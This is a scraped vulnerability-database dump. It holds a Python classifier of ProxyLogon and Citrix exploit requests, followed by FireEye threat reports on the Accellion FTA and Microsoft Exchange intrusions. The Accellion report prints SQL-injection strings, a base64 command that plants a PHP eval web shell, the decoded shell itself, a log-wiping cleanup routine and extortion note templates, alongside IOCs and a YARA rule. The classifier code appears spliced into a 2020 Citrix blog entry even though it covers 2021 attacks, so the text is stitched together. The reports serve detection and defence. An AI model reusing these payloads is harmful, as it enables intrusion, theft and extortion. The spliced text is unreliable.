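    ('POST', '/ecp/y.js', 'X-BEResource=localhost/autodiscover/autodiscover.xml?a=~1942062522;'),
    ('POST', '/owa/auth/x.js', 'X-AnonResource-Backend=localhost/EWS/Exchange.asmx?a=~1942062522'),
    ('POST', '/ecp/y.js', 'X-BEResource=localhost/mapi/emsmdb?a=~1942062522'),
    ('GET', '/vpn/../vpns/cfg/smb.conf', ''),
    ('GET', '/vpn/%2e%2e/vpns/portal/scripts/newbm.pl', ''),
    ('GET', '/owa/auth/logon.aspx', 'ASP.NET_SessionId=abc'),
]


def summarise(records):
    '''Count hits per label, the way the per-endpoint percentages above were built.'''
    counts = {}
    for rec in records:
        for label in classify(rec):
            counts[label] = counts.get(label, 0) + 1
    return counts


if __name__ == '__main__':
    for label, n in sorted(summarise(SAMPLE_RECORDS).items()):
        print(n, label)
```

Two caveats a rule writer would carry over: the Citrix check runs on the URL-decoded but un-normalised path, since a normaliser that collapses /vpn/../vpns/ to /vpns/ before the check is exactly the behaviour the appliance got wrong; and the ProxyLogon check keys on the cookie rather than on the front-end path, because the same crafted cookie reaches the backend through more than one front-end path.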
The Threat Research team will keep tracking this and other zero-day vulnerabilities and their exploits, as well as constantly updating our WAF engine to provide the best mitigation to newly released vulnerabilities.\n\nThe post [Imperva Mitigates Exploits of Citrix Vulnerability - Right Out of the Box](<https://www.imperva.com/blog/imperva-mitigates-exploits-of-citrix-vulnerability-right-out-of-the-box/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-19T15:00:50", "type": "impervablog", "title": "Imperva Mitigates Exploits of Citrix Vulnerability \u2013 Right Out of the Box", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-19T15:00:50", "id": "IMPERVABLOG:4124E2CCDA610C6D222319C47C8D3250", "href": "https://www.imperva.com/blog/imperva-mitigates-exploits-of-citrix-vulnerability-right-out-of-the-box/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fireeye": [{"lastseen": "2021-10-11T12:35:18", "description": "Starting in mid-December 2020, malicious actors that 
Mandiant tracks as UNC2546 exploited multiple zero-day vulnerabilities in Accellion\u2019s legacy File Transfer Appliance (FTA) to install a newly discovered web shell named DEWMODE. The motivation of UNC2546 was not immediately apparent, but starting in late January 2021, several organizations that had been impacted by UNC2546 in the prior month began receiving extortion emails from actors threatening to publish stolen data on the \u201cCL0P^_- LEAKS\" .onion website. Some of the published victim data appears to have been stolen using the DEWMODE web shell.\n\nNotably, the number of victims on the \u201cCL0P^_- LEAKS\" shaming website has increased in February 2021 with organizations in the United States, Singapore, Canada, and the Netherlands recently outed by these threat actors. Mandiant has previously reported that FIN11 has threatened to post stolen victim data on this same .onion site as an additional tactic to pressure victims into paying extortion demands following the deployment of CLOP ransomware. However, in recent CLOP extortion incidents, no ransomware was deployed nor were the other hallmarks of FIN11 present.\n\nWe are currently tracking the exploitation of the zero-day Accellion FTA vulnerabilities and data theft from companies running the legacy FTA product as UNC2546, and the subsequent extortion activity as UNC2582. We have identified overlaps between UNC2582, UNC2546, and prior FIN11 operations, and we will continue to evaluate the relationships between these clusters of activity. For more information on our use of \u2018UNC\u2019 designations, see our blog post, \"DebUNCing Attribution: How Mandiant Tracks Uncategorized Threat Actors.\"\n\nMandiant has been working closely with Accellion in response to these matters and will be producing a complete security assessment report in the coming weeks. 
At this time, [Accellion has patched all FTA vulnerabilities](<https://www.accellion.com/company/press-releases/accellion-provides-update-to-recent-fta-security-incident/>) known to be exploited by the threat actors and has added new monitoring and alerting capabilities to flag anomalies associated with these attack vectors. Mandiant has validated these patches. Mandiant is currently performing penetration testing and code review of the current version of the Accellion FTA product and has not found any other critical vulnerabilities in the FTA product based on our analysis to date. Accellion customers using the FTA legacy product were the targets of the attack.\n\nAccellion FTA is a 20-year-old product nearing end of life. Accellion strongly recommends that [FTA customers migrate to kiteworks](<https://www.accellion.com/products/fta/>), Accellion\u2019s [enterprise content firewall](<https://www.accellion.com/>) platform. Per Accellion, Kiteworks is built on an entirely different code base.\n\nThe following CVEs have since been reserved for tracking the recently patched Accellion FTA vulnerabilities:\n\n * [CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>) \\- SQL injection via a crafted Host header\n * [CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>) \\- OS command execution via a local web service call\n * [CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>) \\- SSRF via a crafted POST request\n * [CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>) \\- OS command execution via a crafted POST request\n\n#### UNC2546 and DEWMODE\n\nIn mid-December 2020, Mandiant responded to multiple incidents in which a web shell we call DEWMODE was used to exfiltrate data from Accellion FTA devices. The Accellion FTA device is a purpose-built application designed to allow an enterprise to securely transfer large files. 
The exfiltration activity has affected entities in a wide range of sectors and countries.\n\nAcross these incidents, Mandiant observed common infrastructure usage and TTPs, including exploitation of FTA devices to deploy the DEWMODE web shell. Mandiant determined that a common threat actor we now track as UNC2546 was responsible for this activity. While complete details of the vulnerabilities leveraged to install DEWMODE are still being analyzed, evidence from multiple client investigations has shown multiple commonalities in UNC2546's activities.\n\n#### Evidence of Exploitation and DEWMODE Installation\n\nMandiant has been able to reconstruct many of the details about how Accellion FTAs have been compromised through examination of Apache and system logs from impacted devices\u2014from initial compromise, to deployment of DEWMODE, and follow-on interaction.\n\nThe earliest identification of activity associated with this campaign occurred in mid-December 2020. At this time, Mandiant identified UNC2546 leveraging an SQL injection vulnerability in the Accellion FTA. 
This SQL injection served as the primary intrusion vector.\n\nMandiant observed evidence of SQL injection followed by subsequent requests to additional resources, as shown in Figure 1.\n\n[.'))union(select(c_value)from(t_global)where(t_global.c_param)=('w1'))#/sid#935ee00][rid#9700968/initial] (1) pass through /courier/document_root.html\n\n['))union(select(loc_id)from(net1.servers)where(proximity)=(0))#/sid#935ee00][rid#9706978/initial] (1) pass through /courier/document_root.html\n\n[.'))union(select(reverse(c_value))from(t_global)where(t_global.c_param)=('w1'))#/sid#935ee00][rid#971c098/initial] (1) pass through /courier/document_root.html\n\n[<redacted>/sid#935ee00][rid#971a090/initial] (1) pass through /courier/sftp_account_edit.php\n\n[<redacted>/sid#935ee00][rid#9706978/initial] (1) pass through /courier/oauth.api\n\n[<redacted>/sid#935ee00][rid#9708980/initial] (1) pass through /courier/oauth.api \n \n--- \n \nFigure 1: SQL injection log\n\nUNC2546 has leveraged this SQL injection vulnerability to retrieve a key which appears to be used in conjunction with a request to the file sftp_account_edit.php. 
Immediately after this request, the built-in Accellion utility admin.pl was executed, resulting in an eval web shell being written to oauth.api.\n\nPWD=/home/seos/courier ; USER=root ; COMMAND=/usr/local/bin/admin.pl --edit_user=F \n\\--mount_cifs=- \nV,DF,$(echo${IFS}PD9waHAKCmlmKGlzc2V0KCRfUkVRVUVTVFsndG9rZW4nXSkpCnsKICAgIGV2YWwoYm \nFzZTY0X2RlY29kZSgkX1JFUVVFU1RbJ3Rva2VuJ10pKTsKfQplbHNlIGlmKGlzc2V0KCRfUkVRVUVTVFsnd \nXNlcm5hbWUnXSkpCnsKICAgIHN5c3RlbSgkX1JFUVVFU1RbJ3VzZXJuYW1lJ10pOwp9CmVsc2UKewogICAgaG \nVhZGVyKCdMb2NhdGlvbjogLycpOwp9|base64${IFS}-d|tee${IFS}/home/seos/courier/oauth.api);FUK;\",PASSWORD # \\\" --passwd=pop \n--- \n \nFigure 2: Excerpt from log showing creation of eval web shell\n\nThe decoded contents are shown in Figure 3.\n\n<?php\n\nif(isset($_REQUEST['token'])) \n{ \neval(base64_decode($_REQUEST['token'])); \n} \nelse if(isset($_REQUEST['username'])) \n{ \nsystem($_REQUEST['username']); \n} \nelse \n{ \nheader('Location: /'); \n} \n \n--- \n \nFigure 3: Decoded eval web shell\n\nAlmost immediately following this sequence, the DEWMODE web shell is written to the system. The timing of these requests suggests that DEWMODE was delivered via the oauth.api web shell; however, the available evidence does not indicate the exact mechanism used to write DEWMODE to disk.\n\nMandiant has identified the DEWMODE web shell in one of the following two locations:\n\n * /home/seos/courier/about.html\n * /home/httpd/html/about.html\n\nThe DEWMODE web shell (Figure 4) extracts a list of available files from a MySQL database on the FTA and lists those files and corresponding metadata\u2014file ID, path, filename, uploader, and recipient\u2014on an HTML page. UNC2546 then uses the presented list to download files through the DEWMODE web shell. 
Download requests are captured in the FTA\u2019s web logs, which will contain requests to the DEWMODE web shell with encrypted and encoded URL parameters, where dwn is the file path and fn is the requested file name (Figure 5). The encrypted file path and name values visible in web logs can be decrypted using key material obtained from the database used by the targeted FTA. Given the complex nature of this process, if your organization needs assistance reviewing relevant logs, please contact Mandiant or Accellion.\n\n\n\n \nFigure 4: DEWMODE web shell screenshot\n\nGET /courier/about.html?dwn=[REDACTED]&fn=[REDACTED] HTTP/1.1\" 200 1098240863 \"-\" \"-\" \"-\" TLSv1.2 ECDHE-RSA-AES128-SHA256 \n--- \n \nFigure 5: DEWMODE File Download URL parameters\n\nFollowing file downloads, UNC2546 initiates a cleanup routine by passing a specific query parameter named csrftoken with the value 11454bd782bb41db213d415e10a0fb3c to DEWMODE. The following actions are performed:\n\n * A shell script is written to /tmp/.scr, which will: \n * Remove all references to about.html from log files located in /var/opt/apache/\n * Write the modified log file to /tmp/x then replace the original log file at /var/opt/apache/\n * Delete the contents of the /home/seos/log/adminpl.log log file.\n * Remove /home/seos/courier/about.html (DEWMODE) and /home/seos/courier/oauth.api (eval web shell), and redirect command output to the file /tmp/.out\n * Change the permissions of the output file to be readable, writeable and executable by all users, and set the owner to \u201cnobody\u201d\n * Delete the script file /tmp/.scr and other temporarily created files to assist in cleanup\n * Display cleanup output to the requesting user\n\nAn example of a cleanup request and subsequent execution of the cleanup script can be seen in Figure 6.\n\nGET /courier/about.html?csrftoken=11454bd782bb41db213d415e10a0fb3c HTTP/1.1\" 200 5 \"-\" \"https://[REDACTED]//courier/about.html?aid=1000\" \"Mozilla/5.0 (X11; Linux 
x86_64; rv:82.0) Gecko/20100101\n\nsft sudo: nobody : TTY=unknown ; PWD=/home/seos/courier ; USER=root ; COMMAND=/usr/local/bin/admin.pl --mount_cifs=AF,DF,'$(sh /tmp/.scr)',PASSWORD \n \n--- \n \nFigure 6: DEWMODE cleanup request\n\nMandiant also identified a variant of DEWMODE (bdfd11b1b092b7c61ce5f02ffc5ad55a) which contained minor changes to the cleanup operation, including wiping of /var/log/secure and removing about.html and oauth.api from the directories /home/httpd/html/ instead of /home/seos/courier/.\n\nIn a subset of incidents, Mandiant observed UNC2546 requesting a file named cache.js.gz (Figure 7). Based on temporal file access to the mysqldump utility and mysql data directories, the archive likely contained a dump of the database. With the exception of cache.js.gz, Mandiant has not observed UNC2546 acquiring files from Accellion appliances through any method besides DEWMODE.\n\nGET //courier/cache.js.gz HTTP/1.1\" 200 35654360 \"-\" \"-\" \"python-requests/2.24.0\" TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 \n--- \n \nFigure 7: cache.js.gz file request\n\n#### UNC2582 Data Theft Extortion\n\nShortly after installation of the web shell, in multiple cases within hours, UNC2546 leveraged DEWMODE to download files from compromised FTA instances. While the actors\u2019 motivations were not immediately clear, several weeks after delivery of the DEWMODE web shell, victims began to receive extortion emails from an actor claiming association with the CLOP ransomware team (Figure 8 and Figure 9). The actors threatened to publish data on the \"CL0P^_- LEAKS\" .onion shaming website, unless the victim paid an extortion fee. We are tracking the subsequent extortion activity under a separate threat cluster, UNC2582. 
Despite tracking the exploitation and extortion activity in separate threat clusters we have observed at least one case where an actor interacted with a DEWMODE web shell from a host that was used to send UNC2582-attributed extortion email.\n\nHello!\n\nYour network has been hacked, a lot of valuable data stolen. <description of stolen data, including the total size of the compressed files> We are the CLOP ransomware team, you can google news and articles about us. We have a website where we publish news and stolen files from companies that have refused to cooperate. Here is his address http://[redacted].onion/ - use TOR browser or http://[redacted].onion.dog/ - mirror. We are visited by 20-30 thousand journalists, IT experts, hackers and competitors every day. We suggest that you contact us via chat within 24 hours to discuss the current situation. <victim-specific negotiation URL> \\- use TOR browser We don't want to hurt, our goal is money. We are also ready to provide any evidence of the presence of files with us. \n \n--- \n \nFigure 8: Extortion Note Template 1\n\nThis is the last warning!\n\nIf you don\u2019t get in touch today, tomorrow we will create a page with screenshots of your files (like the others on our site), send messages to all the emails that we received from your files. Due to the fact that journalists and hackers visit our site, calls and questions will immediately begin, online publications will begin to publish information about the leak, you will be asked to comment.\n\nDo not let this happen, write to us in chat or email and we will discuss the situation!\n\nCHAT: <victim-specific negotiation URL>\n\nEMAIL: unlock@support-box.com\n\nUSE TOR BROWSER! \n \n--- \n \nFigure 9: Extortion Note Template 2\n\nBased on observations at several engagements, UNC2582 appears to follow a pattern of escalation to pressure victims into paying extortion demands. 
Initial emails are sent from a free email account, likely unique per victim, to a seemingly limited distribution of addresses at the victim organization. If the victim does not respond in a timely manner, additional emails are sent to a much larger number of recipients from hundreds or thousands of different email accounts and using varied SMTP infrastructure. In at least one case, UNC2582 also sent emails to partners of the victim organization that included links to the stolen data and negotiation chat. Monitoring of the CL0P^_- LEAKS shaming website has demonstrated that UNC2582 has followed through on threats to publish stolen data as several new victims have appeared on the site in recent weeks, including at least one organization that has publicly confirmed that their Accellion FTA device had been recently targeted.\n\n#### Key Overlaps With FIN11\n\n_UNC2582 (Extortion) and FIN11_\n\nMandiant identified overlaps between UNC2582\u2019s data theft extortion activity and prior [FIN11](<https://www.fireeye.com/blog/threat-research/2020/10/fin11-email-campaigns-precursor-for-ransomware-data-theft.html>) operations, including common email senders and the use of the CL0P^_- LEAKS shaming site. While FIN11 is known for deploying CLOP ransomware, we have previously observed the group conduct data theft extortion without ransomware deployment, similar to these cases.\n\n * Some UNC2582 extortion emails observed in January 2021 were sent from IP addresses and/or email accounts used by FIN11 in multiple phishing campaigns between August and December 2020, including some of the last campaigns that were clearly attributable to the group.\n * We have not observed FIN11 phishing activity in the new year. FIN11 has typically paused their phishing operations over the winter holidays and had several extended gaps in their operations. 
However, the timing of this current hiatus is also consistent with UNC2582\u2019s data theft extortion activity.\n * UNC2582 extortion emails contained a link to the CL0P^_- LEAKS website and/or a victim specific negotiation page. The linked websites were the same ones used to support historical CLOP operations, a series of ransomware and data theft extortion campaigns we suspect can be exclusively attributed to FIN11.\n\n_UNC2546 (FTA Exploitation and DEWMODE) and FIN11_\n\nThere are also limited overlaps between FIN11 and UNC2546.\n\n * Many of the organizations compromised by UNC2546 were previously targeted by FIN11.\n * An IP address that communicated with a DEWMODE web shell was in the \"Fortunix Networks L.P.\" netblock, a network frequently used by FIN11 to host download and FRIENDSPEAK command and control (C2) domains.\n\n#### Implications\n\nThe overlaps between FIN11, UNC2546, and UNC2582 are compelling, but we continue to track these clusters separately while we evaluate the nature of their relationships. One of the specific challenges is that the scope of the overlaps with FIN11 is limited to the later stages of the attack life cycle. UNC2546 uses a different infection vector and foothold, and unlike FIN11, we have not observed the actors expanding their presence across impacted networks. We therefore have insufficient evidence to attribute the FTA exploitation, DEWMODE, or data theft extortion activity to FIN11. Using SQL injection to deploy DEWMODE or acquiring access to a DEWMODE shell from a separate threat actor would represent a significant shift in FIN11 TTPs, given the group has traditionally relied on phishing campaigns as its initial infection vector and we have not previously observed them use zero-day vulnerabilities. 
\n\n#### Acknowledgements\n\nDavid Wong, Brandon Walters, Stephen Eckels and Jon Erickson\n\n#### Indicators of Compromise (IOCs)\n\n_DEWMODE Web Shells_\n\n| **MD5** | **SHA256** |\n|---|---|\n| 2798c0e836b907e8224520e7e6e4bb42 | 5fa2b9546770241da7305356d6427847598288290866837626f621d794692c1b |\n| bdfd11b1b092b7c61ce5f02ffc5ad55a | 2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7 |\n\n_UNC2546 Source IP Addresses_\n\nThe following source IP addresses were observed in multiple UNC2546 intrusions:\n\n * 45.135.229.179\n * 79.141.162.82\n * 155.94.160.40\n * 192.154.253.120\n * 192.52.167.101\n * 194.88.104.24\n\n#### Detections\n\n_FireEye Detections_\n\n * FE_Webshell_PHP_DEWMODE_1\n * FEC_Webshell_PHP_DEWMODE_1\n * Webshell.PHP.DEWMODE\n\n_Mandiant Security Validation_\n\n * A101-515 Malicious File Transfer - DEWMODE Webshell, Upload, Variant #1\n * A101-516 Malicious File Transfer - DEWMODE Webshell, Upload, Variant #2\n\n_DEWMODE YARA Rule_\n\nThe following YARA rule is not intended to be used on production systems or to inform blocking rules without first being validated through an organization's own internal testing processes to ensure appropriate performance and limit the risk of false positives. 
This rule is intended to serve as a starting point for hunting efforts to identify DEWMODE payloads; however, it may need adjustment over time if the malware family changes.\n\nrule DEWMODE_PHP_Webshell \n{ \nstrings: \n$s1 = /if \\\\(isset\\\\(\\$_REQUEST\\\\[[\\x22\\x27]dwn[\\x22\\x27]]\\\\)[\\x09\\x20]{0,32}&&[\\x09\\x20]{0,32}isset\\\\(\\$_REQUEST\\\\[[\\x22\\x27]fn[\\x22\\x27]\\\\]\\\\)\\\\)\\s{0,256}\\\\{/ \n$s2 = \"<th>file_id</th>\" \n$s3 = \"<th>path</th>\" \n$s4 = \"<th>file_name</th>\" \n$s5 = \"<th>uploaded_by</th>\" \n$s6 = \"target=\\\\\\\\\\\"_blank\\\\\\\\\\\">Download</a></td>\" \n$s7 = \"Content-Type: application/octet-stream\" \n$s8 = \"Content-disposition: attachment; filename=\" \ncondition: \nall of them \n} \n---\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-22T00:00:00", "type": "fireeye", "title": "Cyber Criminals Exploit Accellion FTA for Data Theft and Extortion", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-02-22T00:00:00", "id": 
"FIREEYE:A728AA190E170AFDE8BF140059E0D0D5", "href": "https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-11T12:35:13", "description": "Beginning in January 2021, Mandiant Managed Defense observed multiple instances of abuse of Microsoft Exchange Server within at least one client environment. The observed activity included creation of web shells for persistent access, remote code execution, and reconnaissance for endpoint security solutions. Our investigation revealed that the files created on the Exchange servers were owned by the user NT AUTHORITY\\SYSTEM, a privileged local account on the Windows operating system. Furthermore, the process that created the web shell was UMWorkerProcess.exe, the process responsible for Exchange Server\u2019s Unified Messaging Service. In subsequent investigations, we observed malicious files created by w3wp.exe, the process responsible for the Exchange Server web front-end.\n\nIn response to this activity, we built threat hunting campaigns designed to identify additional Exchange Server abuse. We also utilized this data to build higher-fidelity detections of web server process chains. On March 2, 2021, Microsoft released a [blog post](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) that detailed multiple zero-day vulnerabilities used to attack on-premises versions of Microsoft Exchange Server. 
Microsoft also issued emergency Exchange Server updates for the following vulnerabilities:\n\n| **CVE** | **Risk Rating** | **Access Vector** | **Exploitability** | **Ease of Attack** | **Mandiant Intel** |\n|---|---|---|---|---|---|\n| **CVE-2021-26855** | Critical | Network | Functional | Easy | [Link](<https://intelligence.fireeye.com/reports/21-00004941>) |\n| **CVE-2021-26857** | Medium | Network | Functional | Easy | [Link](<https://intelligence.fireeye.com/reports/21-00004938>) |\n| **CVE-2021-26858** | Medium | Network | Functional | Easy | [Link](<https://intelligence.fireeye.com/reports/21-00004944>) |\n| **CVE-2021-27065** | Medium | Network | Functional | Easy | [Link](<https://intelligence.fireeye.com/reports/21-00004939>) |\n\nTable 1: List of March 2021 Microsoft Exchange CVEs and FireEye Intel Summaries\n\nThe activity reported by Microsoft aligns with our observations. **FireEye currently tracks this activity in three clusters, UNC2639, UNC2640, and UNC2643. We anticipate additional clusters as we respond to intrusions.** We recommend following Microsoft\u2019s guidance and patching Exchange Server immediately to mitigate this activity.\n\nBased on our telemetry, we have identified an array of affected victims including US-based retailers, local governments, a university, and an engineering firm. Related activity may also include a Southeast Asian government and Central Asian telecom. 
[Microsoft reported](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) the exploitation occurred together and is linked to a single group of actors tracked as \u201cHAFNIUM\u201d, a group that has previously targeted US-based defense companies, law firms, infectious disease researchers, and think tanks.\n\nIn this blog post, we will detail our observations on the active investigations we are currently performing. As our experience with and knowledge of this threat actor grows, we will update this post or release new technical details as appropriate. For our Managed Defense Customers, we have launched a Community Protection Event that will provide frequent updates on this threat actor and activity.\n\nWe will be discussing these attacks more in an [upcoming webinar on Mar. 17, 2021](<https://www.brighttalk.com/webcast/7451/475010?utm_source=FireEye&utm_medium=brighttalk&utm_campaign=475010>).\n\n#### From Exploit to Web Shell\n\nBeginning in January 2021, Mandiant Managed Defense observed the creation of web shells on one Microsoft Exchange server file system within a customer\u2019s environment. The web shell, named help.aspx (MD5: 4b3039cf227c611c45d2242d1228a121), contained code to identify the presence of (1) FireEye xAgent, (2) CarbonBlack, or (3) CrowdStrike Falcon endpoint products and write the output of discovery. Figure 1 provides a snippet of the web shell\u2019s code.\n\n\n\n \nFigure 1: Snippet of the web shell help.aspx, crafted to identify the presence of endpoint security software on a victim system\n\nThe web shell was written to the system by the UMWorkerProcess.exe process, which is associated with Microsoft Exchange Server\u2019s Unified Messaging service. This activity suggested exploitation of CVE-2021-26858.\n\nApproximately twenty days later, the attacker placed another web shell on a separate Microsoft Exchange Server. 
This second, partially obfuscated web shell, named iisstart.aspx (MD5: 0fd9bffa49c76ee12e51e3b8ae0609ac), was more advanced and contained functions to interact with the file system. As seen in Figure 2, the web shell included the ability to run arbitrary commands and upload, delete, and view the contents of files.\n\n\n\n \nFigure 2: Snippet of iisstart.aspx, uploaded by the attacker in late January 2021\n\nWhile the use of web shells is common amongst threat actors, the parent processes, timing, and victim(s) of these files clearly indicate activity that commenced with the abuse of Microsoft Exchange.\n\nIn March 2021, in a separate environment, we observed a threat actor utilize one or more vulnerabilities to place at least one web shell on the vulnerable Exchange Server. This was likely to establish both persistence and secondary access, as in other environments. In this case, Mandiant observed the process w3wp.exe, (the IIS process associated with the Exchange web front-end) spawning cmd.exe to write a file to disk. The file, depicted in Figure 3, matches signatures for the tried-and-true [China Chopper](<https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-china-chopper.pdf>).\n\n\n\n \nFigure 3: Snippet of China Chopper web shell found on a compromised Exchange Server system\n\nWe observed that in at least two cases, the threat actors subsequently issued the following command against the Exchange web server:\n\nnet group \"Exchange Organization administrators\" administrator /del /domain.\n\nThis command attempts to delete the administrator user from the Exchange Organizations administrators group, beginning with the Domain Controller in the current domain. 
If the system is in a single-system domain, it will execute on the local computer.\n\nPer Microsoft\u2019s blog, they have identified additional post-exploitation activities, including:\n\n * Credential theft via dumping of LSASS process memory.\n * Compression of data for exfiltration via 7-Zip.\n * Use of Exchange PowerShell Snap-ins to export mailbox data.\n * Use of additional offensive security tools [Covenant](<https://github.com/cobbr/Covenant>), [Nishang](<https://github.com/samratashok/nishang>), and [PowerCat](<https://github.com/besimorhino/powercat>) for remote access.\n\nThe activity we have observed, coupled with others in the information security industry, indicates that these threat actors are likely using Exchange Server vulnerabilities to gain a foothold into environments. This activity is followed quickly by additional access and persistence mechanisms. As previously stated, we have multiple ongoing cases and will continue to provide insight as we respond to intrusions.\n\n#### Investigation Tips\n\nWe recommend checking the following for potential evidence of compromise:\n\n * Child processes of C:\\Windows\\System32\\inetsrv\\w3wp.exe on Exchange Servers, particularly cmd.exe.\n * Files written to the system by w3wp.exe or UMWorkerProcess.exe.\n * ASPX files owned by the SYSTEM user\n * New, unexpected compiled ASPX files in the Temporary ASP.NET Files directory\n * Reconnaissance, vulnerability-testing requests to the following resources from an external IP address: \n * /rpc/ directory\n * /ecp/DDI/DDIService.svc/SetObject\n * Non-existent resources\n * With suspicious or spoofed HTTP User-Agents\n * Unexpected or suspicious Exchange PowerShell SnapIn requests to export mailboxes\n\nIn our investigations to date, the web shells placed on Exchange Servers have been named differently in each intrusion, and thus the file name alone is not a high-fidelity indicator of compromise.\n\nIf you believe your Exchange Server was compromised, we recommend 
investigating to determine the scope of the attack and dwell time of the threat actor.\n\nFurthermore, as system and web server logs may have time or size limits enforced, we recommend preserving the following artifacts for forensic analysis:\n\n * At least 14 days of HTTP web logs from the inetpub\\Logs\\LogFiles directories (include logs from all subdirectories)\n * The contents of the Exchange Web Server (also found within the inetpub folder)\n * At least 14 days of Exchange Control Panel (ECP) logs, located in Program Files\\Microsoft\\Exchange Server\\v15\\Logging\\ECP\\Server\n * Microsoft Windows event logs\n\nWe have found significant hunting and analysis value in these log folders, especially for suspicious CMD parameters in the ECP Server logs. We will continue updating technical details as we observe more related activity.\n\n#### Technical Indicators\n\nThe following are technical indicators we have observed, organized by the threat groups we currently associate with this activity. To increase investigation transparency, we are including a Last Known True, or LKT, value for network indicators. 
The LKT timestamp indicates the last time Mandiant knew the indicator was associated with the adversary; however, as with all ongoing intrusions, a reasonable time window should be considered.\n\n##### UNC2639\n\n| **Indicator** | **Type** | **Note** |\n|---|---|---|\n| 165.232.154.116 | Network: IP Address | Last known true: 2021/03/02 02:43 |\n| 182.18.152.105 | Network: IP Address | Last known true: 2021/03/03 16:16 |\n\n##### UNC2640\n\n| **Indicator** | **Type** | **MD5** |\n|---|---|---|\n| help.aspx | File: Web shell | 4b3039cf227c611c45d2242d1228a121 |\n| iisstart.aspx | File: Web shell | 0fd9bffa49c76ee12e51e3b8ae0609ac |\n\n##### UNC2643\n\n| **Indicator** | **Type** | **MD5/Note** |\n|---|---|---|\n| Cobalt Strike BEACON | File: Shellcode | 79eb217578bed4c250803bd573b10151 |\n| 89.34.111.11 | Network: IP Address | Last known true: 2021/03/03 21:06 |\n| 86.105.18.116 | Network: IP Address | Last known true: 2021/03/03 21:39 |\n\n#### Detecting the Techniques\n\nFireEye detects this activity across our platforms. 
The following contains specific detection names that provide an indicator of Exchange Server exploitation or post-exploitation activities we associated with these threat actors.\n\n**_Platform(s): Network Security, Email Security, Detection On Demand, Malware File Scanning, Malware File Storage Scanning_**\n\n_Detection Names_\n\n * FEC_Trojan_ASPX_Generic_2\n * FE_Webshell_ASPX_Generic_33\n * FEC_APT_Webshell_ASPX_HEARTSHELL_1\n * Exploit.CVE-2021-26855\n\n**_Platform(s): Endpoint Security_**\n\n_Real-Time (IOC)_\n\n * SUSPICIOUS CODE EXECUTION FROM EXCHANGE SERVER (EXPLOIT)\n * ASPXSPY WEBSHELL CREATION A (BACKDOOR)\n * PROCDUMP ON LSASS.EXE (METHODOLOGY)\n * TASKMGR PROCESS DUMP OF LSASS.EXE A (METHODOLOGY)\n * NISHANG POWERSHELL TCP ONE LINER (BACKDOOR)\n * SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)\n * POWERSHELL DOWNLOADER (METHODOLOGY)\n\n_Malware Protection (AV/MG)_\n\n * Trojan.Agent.Hafnium.A\n\n_Module Coverage_\n\n * [Process Guard] - prevents dumping of LSASS memory using the procdump utility.\n\n**_Platform(s): Helix_**\n\n * WINDOWS METHODOLOGY [Unusual Web Server Child Process]\n * MICROSOFT EXCHANGE [Authentication Bypass (CVE-2021-26855)]\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-04T00:00:00", "type": 